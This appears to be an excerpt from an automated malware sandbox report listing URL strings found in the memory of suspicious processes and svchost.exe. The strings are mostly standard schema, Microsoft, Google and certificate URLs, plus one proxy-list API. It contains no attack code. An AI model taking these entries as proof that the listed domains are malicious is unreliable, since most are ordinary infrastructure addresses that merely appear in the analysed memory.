                                Source: svchost.exe, 0000000D.00000003.4097878074.0000027EC173A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2247497831.0000027EC1779000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4104083851.0000027EC1E5B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2247465289.0000027EC1776000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4100754948.0000027EC1772000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097757885.0000027EC1737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097288630.0000027EC1770000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098221308.0000027EC1741000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2237943833.0000027EC1774000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb
                                Source: svchost.exe, 0000000D.00000002.4102923997.0000027EC0E5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4104041083.0000027EC1E35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
                                Source: svchost.exe, 0000000D.00000002.4104041083.0000027EC1E35000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4103913948.0000027EC1E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
                                Source: svchost.exe, 0000000D.00000002.4103556512.0000027EC0EE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_kq
                                Source: svchost.exe, 0000002A.00000002.4552683302.0000000005A35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.proxyscrape.com
                                Source: svchost.exe, 0000002A.00000002.4552683302.0000000005A35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.proxyscrape.comd
                                Source: svchost.exe, 0000000C.00000002.3724129711.000001AA922B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4103455410.0000027EC0ECA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                Source: svchost.exe, 0000000D.00000003.4101128405.0000027EC176E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasi
                                Source: svchost.exe, 0000000D.00000003.4100175576.0000027EC170C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098547129.0000027EC170A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098746701.0000027EC170B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                                Source: svchost.exe, 0000000D.00000003.4101128405.0000027EC176E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecuri
                                Source: svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2284338374.0000027EC1779000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2237943833.0000027EC1774000.00000004.00000020.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                                Source: svchost.exe, 0000000D.00000003.4100175576.0000027EC170C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098547129.0000027EC170A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098746701.0000027EC170B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
                                Source: svchost.exe, 0000000D.00000003.4101128405.0000027EC176E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
                                Source: svchost.exe, 0000000D.00000003.2281832079.0000027EC1777000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4101128405.0000027EC176E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd~
                                Source: svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2284338374.0000027EC1779000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2237943833.0000027EC1774000.00000004.00000020.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                                Source: svchost.exe, 0000000D.00000003.4100175576.0000027EC170C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098547129.0000027EC170A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098746701.0000027EC170B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
                                Source: svchost.exe, 0000000D.00000003.4101128405.0000027EC176E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
                                Source: svchost.exe, 0000000D.00000003.4101128405.0000027EC176E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdxV
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                                Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                Source: qmgr.db.12.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                Source: qmgr.db.12.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000002.4138478165.00000000018D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.cMq
                                Source: svchost.exe, 0000000D.00000002.4103985495.0000027EC1E15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
                                Source: espartu.exe, 00000022.00000002.4453169253.0000000000F7A000.00000004.00000010.00020000.00000000.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000000.4044981578.00000000016E8000.00000080.00000001.01000000.0000001F.sdmp, svchost.exe, 0000002A.00000002.4457085471.0000000000938000.00000080.00000001.01000000.00000020.sdmpString found in binary or memory: http://pki-crl.symauth.com/ca_d409a5cb737dc0768fd08ed5256f3633/LatestCRL.crl07
                                Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000000.4044981578.00000000016E8000.00000080.00000001.01000000.0000001F.sdmp, svchost.exe, 0000002A.00000002.4457085471.0000000000938000.00000080.00000001.01000000.00000020.sdmpString found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
                                Source: FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000026.00000000.4044981578.00000000016E8000.00000080.00000001.01000000.0000001F.sdmp, svchost.exe, 0000002A.00000002.4457085471.0000000000938000.00000080.00000001.01000000.00000020.sdmpString found in binary or memory: http://pki-ocsp.symauth.com0
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.4104041083.0000027EC1E35000.00000004.00000020.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                                Source: svchost.exe, 0000000D.00000003.4100987083.0000027EC1765000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097174361.0000027EC1763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/~
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                                Source: newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097637353.0000027EC174C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097555056.0000027EC174A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4101037697.0000027EC174D000.00000004.00000020.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                                Source: svchost.exe, 0000000D.00000003.2308113743.0000027EC1752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4098221308.0000027EC1741000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4100855946.0000027EC1743000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.2284338374.0000027EC1779000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4097174361.0000027EC1763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                                Source: svchost.exe, 0000000D.00000003.4101128405.0000027EC176E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000003.4096986997.0000027EC176B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy=80600
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002C38000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.00000000032A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                                Source: VP2pdCInvS.exe, 0000000B.00000002.2231034006.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, newstart.exe, 00000019.00000002.3939528655.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
